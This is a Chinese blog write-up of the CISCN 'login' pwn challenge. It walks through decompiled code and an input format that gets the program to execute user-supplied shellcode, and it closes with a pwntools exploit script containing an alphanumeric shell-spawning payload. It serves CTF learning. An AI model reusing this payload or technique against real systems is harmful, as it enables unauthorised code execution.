ciscn login

最新推荐文章于 2024-05-22 16:00:43 发布
最新推荐文章于 2024-05-22 16:00:43 发布
阅读量954 收藏 1
点赞数 1
文章标签: 安全 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64195960/article/details/129665333
版权

这是去年国赛一道签到题 当时没做出来 现在来复现一下

一、查看保护

保护全开

二、逆向分析

main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
    char s[1032]; // [rsp+0h] [rbp-410h] BYREF
    unsigned __int64 v4; // [rsp+408h] [rbp-8h]

    v4 = __readfsqword(0x28u);
    sub_C0A();
    while ( 1 )
  {
      memset(s, 0, 0x400uLL);
      printf(">>> ");
      read(0, s, 0x3FFuLL);
      sub_FFD(s);
  }
}

观察发现 while(1) 我们程序可以反复输入

sub_FFD(s)

v13 = __readfsqword(0x28u);
  memset(qword_202040, 0, sizeof(qword_202040));
  v8 = 0;
  v7 = 0;
  dest = 0LL;
  while ( !*a1 || *a1 != 10 && (*a1 != 13 || a1[1] != 10) )
  {
    if ( v8 <= 5 )
      qword_202040[2 * v8] = a1;
    sb = strchr(a1, 58);
    if ( !sb )
    {
      puts("error.");
      exit(1);
    }
    *sb = 0;
    for ( sc = sb + 1; *sc && (*sc == 32 || *sc == 13 || *sc == 10 || *sc == 9); ++sc )
      *sc = 0;
    if ( !*sc )
    {
      puts("abort.");
      exit(2);
    }
    if ( v8 <= 5 )
      qword_202040[2 * v8 + 1] = sc;
    sd = strchr(sc, 10);
    if ( !sd )
    {
      puts("error.");
      exit(3);
    }
    *sd = 0;
    a1 = sd + 1;
    if ( *a1 == 13 )
      *a1++ = 0;
    s1 = qword_202040[2 * v8];
    nptr = qword_202040[2 * v8 + 1];
    if ( !strcasecmp(s1, "opt") )
    {
      if ( v7 )
      {
        puts("error.");
        exit(5);
      }
      v7 = atoi(nptr);
    }
    else
    {
      if ( strcasecmp(s1, "msg") )
      {
        puts("error.");
        exit(4);
      }
      if ( strlen(nptr) <= 1 )
      {
        puts("error.");
        exit(5);
      }
      v9 = strlen(nptr) - 1;
      if ( dest )
      {
        puts("error.");
        exit(5);
      }
      dest = calloc(v9 + 8, 1uLL);
      if ( v9 <= 0 )
      {
        puts("error.");
        exit(5);
      }
      memcpy(dest, nptr, v9);
    }
    ++v8;
  }

主要是会对输入的s(a1)进行一个过滤

只有输入opt:v7\n+msg:dest\n 这种格式的命令才是合法的 否则就会退出

三、利用思路

其实这个程序的漏洞点非常简单

当v7为2时 我们会跳转到这个函数

程序会将我们写入dest的内容当作shellcode执行,因此我们需要传入可视字符串的shellcode

在进入这个if语句前,我们需要将unk_202028和unk_202024都设置为1才行

简单的是,当v7为1时 只要a1(也就是dest)为ro0t的时候,函数进行了初始化

这样我们大体的利用思路就出现了:

通过构造opt:v7\n+msg:dest\n的shellcode

  1. 第一步 将v7设置为1 dest设置为ro0t 将数据进行初始化

  1. 第二部 将v7设置为2 dest设置为我们已经准备好的shellcode

需要注意的地方:

  1. 由于从nptr复制到dest的时候传输的字节数是nptr的长度减1,因此需要多传一个无用的字节

  1. shellcode应该是可视字符shellcode

四、wp

from pwn import *

context.log_level='debug'

p=process('./login')

shellcode='Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
payload1='opt:1\n'+'msg:ro0t\r\n'   
payload2='opt:2\n'+'msg:'+shellcode+'\r\n'

p.sendlineafter('>>> ',payload1)
p.sendlineafter('>>> ',payload2)

p.interactive()
qwq-123
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
CISCN 2021 题目复现
树木常青的博客
05-21 1525
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2350
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
2024CISCN 全国大学生信息安全竞赛创新实践赛MISC部分WP
最新发布
weixin_62467741的博客
05-22 900
最开始得到的是一个内存文件dmp和一个exe,猜测dmp对应的是找浏览器记录,exe对应的是c2地址,exe在虚拟机里运行一下得到的是一个.ss文件夹里面有loader.exe和一个png,png最上面有数据块,直接stegsolve过滤r全通道,savebin,得到类似于zip的文件。在ppt/embeddings文件夹下的docx中,从PPT打开的话就是第二章左上角那块黑色的,双击就行,打开后全选,改字体大小,改颜色,凯撒偏移量10解密,然后base64解密,得到part2。然后base64解码。
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1199
ciscn2023华中赛区pwn
CISCN(web篇)命令执行
cxiaodi的博客
05-05 822
ctf命令执行专题
恢复Cisco 思科路由器口令详细介绍
10-01
恢复Cisco思科路由器口令是网络管理员经常遇到的问题,尤其当忘记了登录密码或者需要重置设备至默认配置时。本文将详细介绍如何恢复Cisco路由器的密码,以便重新获得对设备的管理权限。 首先,如果你的路由器当前是...
思科交换机密码设置方法
10-01
其中,`enable`命令用于进入特权模式,`configure terminal`命令用于进入终端配置模式,`line console 0`命令用于指定console口,`password (cisco)`命令用于设置密码,`login`命令用于启用登录功能。 二、全局密码...
思科交换机部分命令配置
08-19
然后,可以使用`login`命令启用login功能,以便在连接思科交换机时进行身份验证。 保存和删除配置 思科交换机的配置可以保存到running-config文件中。可以使用`copy running-config startup-config`命令将running-...
Cisco Packet Tracer 漢化包.zip
06-14
《Cisco Packet Tracer 漢化包》是一个专为Cisco Packet Tracer设计的语言转换资源,包含四个PTL文件,使得用户可以根据个人需求将软件界面从默认的英文切换为简体中文、繁体中文、法语或德语。这一功能极大地便利了...
思科命令大全
12-03
控制台口(Console port)和虚拟终端(VTY)的登录口令设置也非常重要,例如`line console 0`和`line vty 0 4`分别用于进入这两个接口,然后设置`login`及对应的登录密码。 接下来,我们讨论VLAN的管理和配置。VLAN...
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 960
随便写写
ciscn的简介
weixin_33840661的博客
03-31 1262
www.ciscn.cn 全国大学生信息安全竞赛官网教育部按照《教育部关于进一步加强信息安全学科、专业建设和人才培养工作的意见》(教高〔2005〕7号)的要求及《教育部关于成立2006-2010年教育部高等学校有关科类教学指导委员会的通知》(教高函〔2005〕25号)的有关工作安排,为加强教育部对高等学校信息安全人才培养工作的宏观指导与管理,充分发挥专家学者对信息安全...
2023 ciscn国赛pwn lojin wp
cainiao78777的博客
05-29 2376
第一次参加国赛,被队友带飞了,pwn只做出来了四个,1381分,第16名,总体来说还可以在所有题目中,也是拿到了pwn题login的一血话说回来,来详细说一下,这个pwn题的解法首先就是能看到这是个没附件的pwn题说明只能通过交互去得到信息,再寻找方向,连接之后应该就是这四个选项。
【CTF】【PWN】ciscn_s_3题解
m0_50819561的博客
09-23 740
前置知识: 64位系统: 传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号为0,sys_write 的调用号 为1 stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15 调用方式: 使用 syscall 进行系统调用 首先惯例checksec一下。发现NX保护开了。 用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下 tab转汇编
全国大学生信息安全竞赛(CISCN)-reverse-复现(部分)
ookami6497的博客
06-06 1005
CISCN
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
m0_74918915的博客
04-12 1617
其中返回机器的硬件地址(MAC地址),而返回特定于平台的唯一ID。4.: 将所有上述信息串联并进行哈希,得到一个SHA1哈希值。这里,函数将公开信息和私有信息合并为一个序列,然后这个序列中的每一项都被加入到哈希中。添加了一个额外的“salt”值,以确保最终的哈希值是独特的。5.将哈希值转换为16进制的字符串形式,并从中取出前20个字符。然后,它前面添加了"__wzd"前缀来生成最终的。再通过查找关键字,找到set_cookie方法。
2022CISCNmisc
qq_63928796的博客
06-21 477
题目已经告诉是usb流量一共有三个地址2.8 2.10 2.4但2.4没用,我们分别导出2.8和2.10从网上搜usb脚本将他们两个分别解出来将那一打穿放到010发现是个rar文件但是损坏了打不开,可以用winrar修复修复成功后得到一个加密的rar刚刚还有一串字符没用那个就是密码打开就得到flag打开题目是一张图片,放到StegSolve中查看,再A2中发现东西提取出来是f78dcd383f1b574b暂时不知道有什么用,之后看wp是加密的lsb隐写那f78dcd383f1b574b可能就是密码解出来一个
ciscn 2018 部分writeup
StriveBen的博客
05-07 3915
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
思科网络工程师实验指南:AAA配置详解
例如,`aaa authentication login`用于登录EXEC命令行模式的用户认证,而`aaa authentication enable`则用于授权用户能否进入特权模式。你可以指定多种认证方法,如`local`(使用路由器自身的用户数据库)或外部...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值